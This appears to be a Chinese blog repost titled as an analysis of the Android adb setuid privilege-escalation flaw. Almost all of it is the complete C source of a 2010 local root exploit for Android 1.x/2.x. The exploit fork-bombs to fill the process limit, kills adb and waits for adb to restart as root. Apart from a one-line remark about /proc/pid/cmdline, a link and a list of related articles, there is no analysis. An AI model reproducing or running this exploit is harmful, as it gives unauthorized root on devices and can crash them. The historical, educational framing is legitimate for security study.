Android adb setuid提权漏洞之分析
2014-10-17 12:08
585 查看
/* android 1.x/2.x adb setuid() root exploit * (C) 2010 The Android Exploid Crew * * Needs to be executed via adb -d shell. It may take a while until * all process slots are filled and the adb connection is reset. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! */ #include <stdio.h> #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <signal.h> #include <stdlib.h> void die(const char *msg) { perror(msg); exit(errno); } pid_t find_adb() { char buf[256]; int i = 0, fd = 0; pid_t found = 0; for (i = 0; i < 32000; ++i) { sprintf(buf, "/proc/%d/cmdline", i); if ((fd = open(buf, O_RDONLY)) < 0) continue; memset(buf, 0, sizeof(buf)); read(fd, buf, sizeof(buf) - 1); close(fd); if (strstr(buf, "/sbin/adb")) { found = i; break; } } return found; } void restart_adb(pid_t pid) { kill(pid, 9); } void wait_for_root_adb(pid_t old_adb) { pid_t p = 0; for (;;) { p = find_adb(); if (p != 0 && p != old_adb) break; sleep(1); } sleep(5); kill(-1, 9); } int main(int argc, char **argv) { pid_t adb_pid = 0, p; int pids = 0, new_pids = 1; int pepe[2]; char c = 0; struct rlimit rl; printf("[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n"); printf("[*] checking NPROC limit ...\n"); if (getrlimit(RLIMIT_NPROC, &rl) < 0) die("[-] getrlimit"); if (rl.rlim_cur == RLIM_INFINITY) { printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n"); exit(1); } printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max); printf("[*] Searching for adb ...\n"); adb_pid = find_adb(); if (!adb_pid) die("[-] Cannot find adb"); printf("[+] Found adb as PID %d\n", adb_pid); printf("[*] Spawning children. Dont type anything and wait for reset!\n"); printf("[*]\n[*] If you like what we are doing you can send us PayPal money to\n" "[*] 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n" "[*] If you are a company and feel like you profit from our work,\n" "[*] we also accept donations > 1000 USD!\n"); printf("[*]\n[*] adb connection will be reset. restart adb server on desktop and re-login.\n"); sleep(5); if (fork() > 0) exit(0); setsid(); pipe(pepe); /* generate many (zombie) shell-user processes so restarting * adb's setuid() will fail. * The whole thing is a bit racy, since when we kill adb * there is one more process slot left which we need to * fill before adb reaches setuid(). Thats why we fork-bomb * in a seprate process. */ if (fork() == 0) { close(pepe[0]); for (;;) { if ((p = fork()) == 0) { exit(0); } else if (p < 0) { if (new_pids) { printf("\n[+] Forked %d childs.\n", pids); new_pids = 0; write(pepe[1], &c, 1); close(pepe[1]); } } else { ++pids; } } } close(pepe[1]); read(pepe[0], &c, 1); restart_adb(adb_pid); if (fork() == 0) { fork(); for (;;) sleep(0x743C); } wait_for_root_adb(adb_pid); return 0; }
一个进程的命令行保存在文件/proc/pid/cmdline中
http://www.claudxiao.net/2011/04/android-adb-setuid/
相关文章推荐
- Android adb setuid提权漏洞的分析
- Android adb setuid提权漏洞的分析
- Android adb setuid提权漏洞的分析
- Android adb setuid提权漏洞的分析
- Android adb setuid提权漏洞的分析(转)
- Android adb setuid提权漏洞的分析
- Android adb setuid提权漏洞的分析
- Android adb setuid提权漏洞
- Android Superuser 提权漏洞分析
- Android提权漏洞CVE-2014-7920&CVE-2014-7921分析
- (转)Android Superuser提权漏洞分析
- CVE-2014-7911 Android本地提权漏洞分析与利用
- Android Superuser 提权漏洞分析
- CVE 2013-6272 Android phone提权打电话漏洞分析
- Android提权漏洞CVE-2014-7920&CVE-2014-7921分析
- ADB backupAgent 提权漏洞分析 (CVE-2014-7953)
- Android提权漏洞分析——rageagainstthecage
- android提权漏洞CVE-2010-EASY修复
- Android 分析监听器上的参数position和id(二)
- Android 分析监听器上的参数position和id(一)